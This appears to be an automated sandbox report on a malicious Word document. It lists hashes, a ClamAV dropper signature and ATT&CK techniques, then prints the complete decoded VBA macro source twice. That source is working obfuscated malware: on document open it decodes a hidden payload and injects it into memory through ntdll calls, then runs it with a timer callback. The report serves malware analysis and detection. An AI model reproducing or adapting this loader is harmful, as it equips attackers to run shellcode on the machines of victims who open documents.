Office (OLE) malware analysis — malicious · b0cb24c43c828895

MALICIOUS

Office (OLE)

307.5 KB Created: 2018-02-12 14:05:00 Authoring application: Microsoft Office Word First seen: 2018-03-30

MD5: 0d7ba14846c51efe322878cfcc9ca9cb SHA-1: 272dd23cab2ba5b0a2d127261c942a00995d814c SHA-256: b0cb24c43c82889505b4bb29589508cb99d5c86edbb576d47e2b501491dd419e

90 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file is identified as malicious by ClamAV with the signature 'Doc.Dropper.Agent-6467993-0'. It contains VBA macros, including a Document_Open macro, which is a common technique for executing malicious code upon file opening. The script's obfuscated nature and use of API calls like 'NtAllocateVirtualMemory' suggest it is designed to download and execute a secondary payload, aligning with the behavior of a dropper malware.

Heuristics 4

ClamAV: Doc.Dropper.Agent-6467993-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Agent-6467993-0
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
Document_Open macro low OLE_VBA_DOCOPEN

Document_Open macro
Matched line in script
```
Private Sub Document_Open()
selfdenial
```
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 9884 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	9884 bytes
SHA-256: `2ea632ec5a61578c84d8e0988f682951bc994234a4d8c55c3a2412a58de5b8f1`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub Document_Open() selfdenial recommendation = 53 + 3 Pmt 0, recommendation, 12303, 28962, 2 End Sub Attribute VB_Name = "nissan" #If (37 - 103 + 466 + 51 - 107 + 356) > ((114 - 95 + 301) - (48 - 3 + 495) * 1) And Not ((73 - 3 - 42) - (38 - 93 + 83)) * 2 < (Win64) Then Public Declare Function colinus _ Lib "Ntdll " Alias _ "NtAllocateVirtualMemory" (maure As Long, dreyfus As Long, ByVal curettage As Long, bichlorideByVal As Long, iridic As Long, ByVal bgirl As Long) As Long #End If Function deflect(after) #If (114 - 125 + 411 + 32 - 93 + 361) > ((128 - 70 + 262) - (77 - 91 + 554) * 1) And ((6 - 114 + 136) - (127 - 91 - 8)) * 2 < (Win64) Then Dim estoppel As LongPtr countywide = 65 - 126 + 69 Dim comburent As LongPtr Dim hampshire As LongPtr dipsacus = VarPtr(estoppel) bogtrotter = fijian(dipsacus, VarPtr(after) + (10 - 75 + 73), countywide) #End If #If (4 - 31 + 427 + 89 - 28 + 239) > ((128 - 77 + 269) - (91 - 40 + 489) * 1) And Not ((55 - 123 + 96) - (84 - 112 + 56)) * 2 < (Win64) Then Dim estoppel As Long countywide = 58 - 23 - 31 Dim comburent As Long Dim hampshire As Long dipsacus = VarPtr(estoppel) bogtrotter = puncuality(dipsacus, VarPtr(after) + (124 - 39 - 77), countywide) #End If comburent = 42 - 112 + 70 hampshire = 18 - 84 + 9905 antipsychotic = 39 - 101 + 4158 booze = 99 - 42 + 7 commelina = colinus(ByVal (91 - 126 + 34), _ comburent, _ ByVal (36 - 66 + 30), hampshire, _ ByVal antipsychotic, _ ByVal booze) puncuality comburent, estoppel, 38 - 101 + 5946 Pmt 0, (48 + 17), 20068, 10392, 3 deflect = comburent End Function Attribute VB_Name = "mustang" #If (44 - 73 + 429 + 73 - 10 + 237) > ((128 - 51 + 243) - (46 - 29 + 523) * 1) And ((128 - 45 - 55) - (99 - 71 + 0)) * 2 < (Win64) Then Public Declare PtrSafe Function colinus _ Lib "ntdll " Alias _ "NtAllocateVirtualMemory" (bridewell As LongPtr, bookmaker As LongPtr, ByVal oca As LongPtr, actualizedByVal As LongPtr, constituting As LongPtr, ByVal cock As LongPtr) As LongPtr #End If #If (37 - 103 + 466 + 51 - 107 + 356) > ((114 - 95 + 301) - (48 - 3 + 495) * 1) And Not ((73 - 3 - 42) - (38 - 93 + 83)) * 2 < (Win64) Then Public Declare Function rearguard _ Lib "Kernel32" Alias _ "CreateTimerQueueTimer" (bedight As Any, ByVal confine As Any, ByVal microgramma As Any, ByVal insensibly As Any, ByVal experiment As Any, ByVal maildrop As Any, ByVal leymus As Any) As Long #End If Public Function superabat(cancan) As String Dim bawdyhouse(63) As Long Dim sundowner(6962) As Byte Dim chalcedony As Long Dim samara As Long Dim embellishment As Long Dim tightfitting(63) As Long Dim fixedness(63) As Long Dim osmanthus() As Byte Dim wotan As Long proctology = 11 - 58 + 262191 alongside = 70 - 72 + 257 meanings = 117 - 104 + 243 direction = 20 - 12 + 4088 qualification = 94 - 4 + 65446 cebidae = 103 - 49 + 10 evenhanded = 87 - 98 + 65291 severalty = 33 - 41 + 16711688 Dim hurl() As Byte hurl = VBA.StrConv(cancan, 120 + 8) miserere = 1 + 59 Pmt 0, miserere, 26798, 42787, 6 clamp = 7840 + 3 padre = vbKeyShift - 12 For attendance = (3 - 3) To clamp If attendance Mod 2 = (4 - 4) Then hurl(attendance) = hurl(attendance) - padre Else hurl(attendance) = hurl(attendance) - (padre - 1) End If Next attendance crumenal = 27 + 27 Pmt 0, crumenal, 9696, 24175, 6 backswimmer = stridor For chalcedony = (16 - 8 * 2) * 1 To (80 / 2 + 23) * (7 - 6) bawdyhouse(chalcedony) = insubordinate(chalcedony, cebidae, 47) fixedness(chalcedony) = insubordinate(chalcedony, direction, 47) tightfitting(chalcedony) = insubordinate(chalcedony, proctology, 47) Next chalcedony rosales = 6 + 29 Pmt 0, rosales, 39805, 48993, 7 osmanthus = hurl arbitrament = 21 + 51 Pmt 0, arbitrament, 9930, 52430, 4 christianity = 101 - 78 - 20 captivity = christianity + 1 poohpoohpooh = 53 - 61 + 10 For samara = (2 - 2) To clamp continuous = osmanthus(samara) betrayer = osmanthus(samara + 2) appliance = fixedness(backswimmer(osmanthus(samara + 1))) transshipment = bawdyhouse(backswimmer(betrayer)) + backswimmer(osmanthus(samara + christianity)) wotan = tightfitting(backswimmer(continuous)) + appliance + transshipment chalcedony = insubordinate(wotan, severalty, 39) sundowner(embellishment) = insubordinate(chalcedony, qualification, 29) chalcedony = insubordinate(wotan, evenhanded, 39) sundowner(embellishment + 1) = insubordinate(chalcedony, meanings, 29) sundowner(embellishment + poohpoohpooh) = insubordinate(wotan, alongside, 39) embellishment = embellishment + poohpoohpooh + 1 samara = samara + 3 Next superabat = sundowner End Function Attribute VB_Name = "kiario" #If (44 - 73 + 429 + 73 - 10 + 237) > ((128 - 51 + 243) - (46 - 29 + 523) * 1) And ((128 - 45 - 55) - (99 - 71 + 0)) * 2 < (Win64) Then Public Declare PtrSafe Function rearguard _ Lib "Kernel32 " Alias _ "CreateTimerQueueTimer" (involute As Any, ByVal sharpcornered As Any, ByVal granicus As Any, ByVal lordosis As Any, ByVal harem As Any, ByVal corbina As Any, ByVal admeasurement As Any) As Long #End If #If (37 - 103 + 466 + 51 - 107 + 356) > ((114 - 95 + 301) - (48 - 3 + 495) * 1) And Not ((73 - 3 - 42) - (38 - 93 + 83)) * 2 < (Win64) Then Public Declare Function assumiing _ Lib "ntdll " Alias _ "NtWriteVirtualMemory" (ByVal machiavelism As Any, ByVal scours As Any, ByVal consciously As Any, ByVal caracolito As Any, ByVal citrulline As Any) As Long #End If Function puncuality(contemptible, dalea, terebinth) Dim cyprinus As Long Dim daffy As Long Dim rostiferous As Long Dim keck As Long Dim arenaria As Long befog = befog cyprinus = contemptible arenaria = terebinth rostiferous = dalea Pmt 0, (11 + 46), 22959, 16298, 5 daffy = 40 - 17 - 24 assumiing ByVal daffy, _ cyprinus, _ rostiferous, _ arenaria, keck End Function Function insubordinate(maturation, blossoms, assumption) If assumption = 29 + (10 / 2 - 5) Then insubordinate = maturation \ blossoms ElseIf assumption = 39 + (5 - 3) / 2 - 1 Then insubordinate = maturation And blossoms ElseIf assumption = 47 + (56 / 7 - 4 * 2) Then insubordinate = maturation * blossoms End If End Function Function stridor() Dim unforgivingly(255) As Byte inevitable = (83 - 11 - 7) For i = (inevitable) + (1 - 1) To (41 - 81 + 131) unforgivingly(inevitable) = inevitable - (68 - 55 + 52) inevitable = (inevitable + 1) If (14 - 57 + 134) < athanor Then Exit For Next inevitable = (94 - 50 + 4) For i = inevitable + (1 - 1) To (35 - 118 + 141) unforgivingly(inevitable) = inevitable + (25 - 102 + 81) inevitable = (inevitable + 1) If (128 - 32 - 38) < athanor Then Exit For Next inevitable = (128 - 109 + 78) For i = inevitable + (1 - 1) To (128 - 35 + 30) unforgivingly(inevitable) = inevitable - (37 - 77 + 111) inevitable = (inevitable + 1) If (38 - 9 + 94) < athanor Then Exit For Next unforgivingly(53 - 49 + 43) = (17 - 70 + 116) inevitable = (127 - 49 - 35) unforgivingly(inevitable) = (67 - 40 + 35) stridor = unforgivingly End Function Attribute VB_Name = "degradation" #If (44 - 73 + 429 + 73 - 10 + 237) > ((128 - 51 + 243) - (46 - 29 + 523) * 1) And ((128 - 45 - 55) - (99 - 71 + 0)) * 2 < (Win64) Then Public Declare PtrSafe Function assumiing _ Lib "ntdll " Alias _ "NtWriteVirtualMemory" (ByVal volgaic As Any, ByVal milliner As Any, ByVal obstinancy As Any, ByVal oemula As Any, ByVal blockhead As Any) As LongPtr #End If Function fijian(consultum, syllabically, obligate) Dim crematorium As LongPtr Dim nonlexically As LongPtr Dim acidic As LongPtr Dim illstarred As LongPtr Dim cagliostro As LongPtr nonlexically = consultum cagliostro = obligate illstarred = syllabically calcutta = 23 + 40 Pmt 0, calcutta, 29918, 36852, 4 crematorium = 112 - 79 - 34 assumiing ByVal crematorium, _ nonlexically, _ illstarred, cagliostro, _ acidic End Function Function selfdenial() flotsam.privation.Value = Day(#12/5/2013#) varday = combine = "occultist" Set hightop = flotsam.privation.SelectedItem bellow = 51 + 4 Pmt 0, bellow, 15482, 34112, 7 atavistic = hightop.Name floorcover = 4 - 125 + 7965 cassius = Right(atavistic, floorcover) apres = superabat(cassius) Pmt 0, (21 + 46), 38471, 17048, 4 #If (101 - 28 + 327 + 101 - 21 + 220) > ((68 - 126 + 378) - (125 - 93 + 508) * 1) And ((79 - 95 + 44) - (15 - 53 + 66)) * 2 < (Win64) Then Dim orthoptera As LongPtr Dim copying As LongPtr Dim discard As LongPtr Dim cortes As LongPtr Dim crosslinguistic As LongPtr animism = 88 - 60 + 2036 #End If #If (58 - 56 + 398 + 38 - 91 + 353) > ((38 - 55 + 337) - (7 - 92 + 625) * 1) And Not ((88 - 14 - 46) - (30 - 123 + 121)) * 2 < (Win64) Then Dim copying As Long Dim orthoptera As Long Dim discard As Long Dim cortes As Long Dim crosslinguistic As Long animism = (6 - 80 + 855) + 3459 #End If Pmt 0, (16 + 16), 4607, 46601, 4 philander = 22 + 41 Pmt 0, philander, 16955, 30590, 7 broil = apres orthoptera = deflect(broil) discard = 7 - 103 + 96 copying = orthoptera + animism cortes = 42 - 78 + 201563 crosslinguistic = 39 - 12 + 3473 mg = rearguard(cortes, discard, _ copying, discard, _ discard, _ discard, discard) archipelago = 7 + 26 Pmt 0, archipelago, 25946, 57139, 5 End Function Attribute VB_Name = "flotsam" Attribute VB_Base = "0{8EDF9204-EC5B-4855-B1A4-EDF33C6052A7}{6AF6A7CE-C394-4C51-B2C5-59677F4C76BA}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False

SHA-256: 2ea632ec5a61578c84d8e0988f682951bc994234a4d8c55c3a2412a58de5b8f1

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Private Sub Document_Open()
selfdenial
recommendation = 53 + 3
 Pmt 0, recommendation, 12303, 28962, 2
End Sub



Attribute VB_Name = "nissan"
#If (37 - 103 + 466 + 51 - 107 + 356) > ((114 - 95 + 301) - (48 - 3 + 495) * 1) And Not ((73 - 3 - 42) - (38 - 93 + 83)) * 2 < (Win64) Then
Public Declare Function colinus _
Lib "Ntdll  " Alias _
"NtAllocateVirtualMemory" (maure As Long, dreyfus As Long, ByVal curettage As Long, bichlorideByVal As Long, iridic As Long, ByVal bgirl As Long) As Long
#End If
Function deflect(after)
#If (114 - 125 + 411 + 32 - 93 + 361) > ((128 - 70 + 262) - (77 - 91 + 554) * 1) And ((6 - 114 + 136) - (127 - 91 - 8)) * 2 < (Win64) Then
Dim estoppel As LongPtr
countywide = 65 - 126 + 69
Dim comburent As LongPtr
Dim hampshire As LongPtr
dipsacus = VarPtr(estoppel)
bogtrotter = fijian(dipsacus, VarPtr(after) + (10 - 75 + 73), countywide)
#End If
#If (4 - 31 + 427 + 89 - 28 + 239) > ((128 - 77 + 269) - (91 - 40 + 489) * 1) And Not ((55 - 123 + 96) - (84 - 112 + 56)) * 2 < (Win64) Then
Dim estoppel As Long
countywide = 58 - 23 - 31
Dim comburent As Long
Dim hampshire As Long
dipsacus = VarPtr(estoppel)
bogtrotter = puncuality(dipsacus, VarPtr(after) + (124 - 39 - 77), countywide)
#End If
comburent = 42 - 112 + 70
hampshire = 18 - 84 + 9905
antipsychotic = 39 - 101 + 4158
booze = 99 - 42 + 7
commelina = colinus(ByVal (91 - 126 + 34), _
comburent, _
ByVal (36 - 66 + 30), hampshire, _
ByVal antipsychotic, _
ByVal booze)
puncuality comburent, estoppel, 38 - 101 + 5946
Pmt 0, (48 + 17), 20068, 10392, 3
deflect = comburent
End Function


Attribute VB_Name = "mustang"
#If (44 - 73 + 429 + 73 - 10 + 237) > ((128 - 51 + 243) - (46 - 29 + 523) * 1) And ((128 - 45 - 55) - (99 - 71 + 0)) * 2 < (Win64) Then
Public Declare PtrSafe Function colinus _
Lib "ntdll    " Alias _
"NtAllocateVirtualMemory" (bridewell As LongPtr, bookmaker As LongPtr, ByVal oca As LongPtr, actualizedByVal As LongPtr, constituting As LongPtr, ByVal cock As LongPtr) As LongPtr
#End If
#If (37 - 103 + 466 + 51 - 107 + 356) > ((114 - 95 + 301) - (48 - 3 + 495) * 1) And Not ((73 - 3 - 42) - (38 - 93 + 83)) * 2 < (Win64) Then
Public Declare Function rearguard _
Lib "Kernel32" Alias _
"CreateTimerQueueTimer" (bedight As Any, ByVal confine As Any, ByVal microgramma As Any, ByVal insensibly As Any, ByVal experiment As Any, ByVal maildrop As Any, ByVal leymus As Any) As Long
#End If
Public Function superabat(cancan) As String
Dim bawdyhouse(63) As Long
Dim sundowner(6962) As Byte
Dim chalcedony As Long
Dim samara As Long
Dim embellishment As Long
Dim tightfitting(63) As Long
Dim fixedness(63) As Long
Dim osmanthus() As Byte
Dim wotan As Long
proctology = 11 - 58 + 262191
alongside = 70 - 72 + 257
meanings = 117 - 104 + 243
direction = 20 - 12 + 4088
qualification = 94 - 4 + 65446
cebidae = 103 - 49 + 10
evenhanded = 87 - 98 + 65291
severalty = 33 - 41 + 16711688
Dim hurl() As Byte
hurl = VBA.StrConv(cancan, 120 + 8)
miserere = 1 + 59
Pmt 0, miserere, 26798, 42787, 6
clamp = 7840 + 3
padre = vbKeyShift - 12
For attendance = (3 - 3) To clamp
If attendance Mod 2 = (4 - 4) Then
hurl(attendance) = hurl(attendance) - padre
Else
hurl(attendance) = hurl(attendance) - (padre - 1)
End If
Next attendance
crumenal = 27 + 27
Pmt 0, crumenal, 9696, 24175, 6
backswimmer = stridor
For chalcedony = (16 - 8 * 2) * 1 To (80 / 2 + 23) * (7 - 6)
bawdyhouse(chalcedony) = insubordinate(chalcedony, cebidae, 47)
fixedness(chalcedony) = insubordinate(chalcedony, direction, 47)
tightfitting(chalcedony) = insubordinate(chalcedony, proctology, 47)
Next chalcedony
rosales = 6 + 29
Pmt 0, rosales, 39805, 48993, 7
osmanthus = hurl
arbitrament = 21 + 51
Pmt 0, arbitrament, 9930, 52430, 4
christianity = 101 - 78 - 20
captivity = christianity + 1
poohpoohpooh = 53 - 61 + 10
For samara = (2 - 2) To clamp
continuous = osmanthus(samara)
betrayer = osmanthus(samara + 2)
appliance = fixedness(backswimmer(osmanthus(samara + 1)))
transshipment = bawdyhouse(backswimmer(betrayer)) + backswimmer(osmanthus(samara + christianity))
wotan = tightfitting(backswimmer(continuous)) + appliance + transshipment
chalcedony = insubordinate(wotan, severalty, 39)
sundowner(embellishment) = insubordinate(chalcedony, qualification, 29)
chalcedony = insubordinate(wotan, evenhanded, 39)
sundowner(embellishment + 1) = insubordinate(chalcedony, meanings, 29)
sundowner(embellishment + poohpoohpooh) = insubordinate(wotan, alongside, 39)
embellishment = embellishment + poohpoohpooh + 1
samara = samara + 3
Next
superabat = sundowner
End Function



Attribute VB_Name = "kiario"
#If (44 - 73 + 429 + 73 - 10 + 237) > ((128 - 51 + 243) - (46 - 29 + 523) * 1) And ((128 - 45 - 55) - (99 - 71 + 0)) * 2 < (Win64) Then
Public Declare PtrSafe Function rearguard _
Lib "Kernel32  " Alias _
"CreateTimerQueueTimer" (involute As Any, ByVal sharpcornered As Any, ByVal granicus As Any, ByVal lordosis As Any, ByVal harem As Any, ByVal corbina As Any, ByVal admeasurement As Any) As Long
#End If
#If (37 - 103 + 466 + 51 - 107 + 356) > ((114 - 95 + 301) - (48 - 3 + 495) * 1) And Not ((73 - 3 - 42) - (38 - 93 + 83)) * 2 < (Win64) Then
Public Declare Function assumiing _
Lib "ntdll   " Alias _
"NtWriteVirtualMemory" (ByVal machiavelism As Any, ByVal scours As Any, ByVal consciously As Any, ByVal caracolito As Any, ByVal citrulline As Any) As Long
#End If
Function puncuality(contemptible, dalea, terebinth)
Dim cyprinus As Long
Dim daffy As Long
Dim rostiferous As Long
Dim keck As Long
Dim arenaria As Long
befog = befog
cyprinus = contemptible
arenaria = terebinth
rostiferous = dalea
Pmt 0, (11 + 46), 22959, 16298, 5
daffy = 40 - 17 - 24
assumiing ByVal daffy, _
cyprinus, _
rostiferous, _
arenaria, keck
End Function
Function insubordinate(maturation, blossoms, assumption)
If assumption = 29 + (10 / 2 - 5) Then
insubordinate = maturation \ blossoms
ElseIf assumption = 39 + (5 - 3) / 2 - 1 Then
insubordinate = maturation And blossoms
ElseIf assumption = 47 + (56 / 7 - 4 * 2) Then
insubordinate = maturation * blossoms
End If
End Function
Function stridor()
Dim unforgivingly(255) As Byte
inevitable = (83 - 11 - 7)
For i = (inevitable) + (1 - 1) To (41 - 81 + 131)
unforgivingly(inevitable) = inevitable - (68 - 55 + 52)
inevitable = (inevitable + 1)
If (14 - 57 + 134) < athanor Then Exit For
Next
inevitable = (94 - 50 + 4)
For i = inevitable + (1 - 1) To (35 - 118 + 141)
unforgivingly(inevitable) = inevitable + (25 - 102 + 81)
inevitable = (inevitable + 1)
If (128 - 32 - 38) < athanor Then Exit For
Next
inevitable = (128 - 109 + 78)
For i = inevitable + (1 - 1) To (128 - 35 + 30)
unforgivingly(inevitable) = inevitable - (37 - 77 + 111)
inevitable = (inevitable + 1)
If (38 - 9 + 94) < athanor Then Exit For
Next
unforgivingly(53 - 49 + 43) = (17 - 70 + 116)
inevitable = (127 - 49 - 35)
unforgivingly(inevitable) = (67 - 40 + 35)
stridor = unforgivingly
End Function

Attribute VB_Name = "degradation"
#If (44 - 73 + 429 + 73 - 10 + 237) > ((128 - 51 + 243) - (46 - 29 + 523) * 1) And ((128 - 45 - 55) - (99 - 71 + 0)) * 2 < (Win64) Then
Public Declare PtrSafe Function assumiing _
Lib "ntdll   " Alias _
"NtWriteVirtualMemory" (ByVal volgaic As Any, ByVal milliner As Any, ByVal obstinancy As Any, ByVal oemula As Any, ByVal blockhead As Any) As LongPtr
#End If
Function fijian(consultum, syllabically, obligate)
Dim crematorium As LongPtr
Dim nonlexically As LongPtr
Dim acidic As LongPtr
Dim illstarred As LongPtr
Dim cagliostro As LongPtr
nonlexically = consultum
cagliostro = obligate
illstarred = syllabically
calcutta = 23 + 40
Pmt 0, calcutta, 29918, 36852, 4
crematorium = 112 - 79 - 34
assumiing ByVal crematorium, _
nonlexically, _
illstarred, cagliostro, _
acidic
End Function
Function selfdenial()
flotsam.privation.Value = Day(#12/5/2013#)
varday = combine = "occultist"
Set hightop = flotsam.privation.SelectedItem
bellow = 51 + 4
Pmt 0, bellow, 15482, 34112, 7
atavistic = hightop.Name
floorcover = 4 - 125 + 7965
cassius = Right(atavistic, floorcover)
apres = superabat(cassius)
Pmt 0, (21 + 46), 38471, 17048, 4
#If (101 - 28 + 327 + 101 - 21 + 220) > ((68 - 126 + 378) - (125 - 93 + 508) * 1) And ((79 - 95 + 44) - (15 - 53 + 66)) * 2 < (Win64) Then
Dim orthoptera As LongPtr
Dim copying As LongPtr
Dim discard As LongPtr
Dim cortes As LongPtr
Dim crosslinguistic As LongPtr
animism = 88 - 60 + 2036
#End If
#If (58 - 56 + 398 + 38 - 91 + 353) > ((38 - 55 + 337) - (7 - 92 + 625) * 1) And Not ((88 - 14 - 46) - (30 - 123 + 121)) * 2 < (Win64) Then
Dim copying As Long
Dim orthoptera As Long
Dim discard As Long
Dim cortes As Long
Dim crosslinguistic As Long
animism = (6 - 80 + 855) + 3459
#End If
Pmt 0, (16 + 16), 4607, 46601, 4
philander = 22 + 41
Pmt 0, philander, 16955, 30590, 7
broil = apres
orthoptera = deflect(broil)
discard = 7 - 103 + 96
copying = orthoptera + animism
cortes = 42 - 78 + 201563
crosslinguistic = 39 - 12 + 3473
mg = rearguard(cortes, discard, _
copying, discard, _
discard, _
discard, discard)
archipelago = 7 + 26
Pmt 0, archipelago, 25946, 57139, 5
End Function

Attribute VB_Name = "flotsam"
Attribute VB_Base = "0{8EDF9204-EC5B-4855-B1A4-EDF33C6052A7}{6AF6A7CE-C394-4C51-B2C5-59677F4C76BA}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Open this report in the interactive analyzer, or submit your own file for analysis.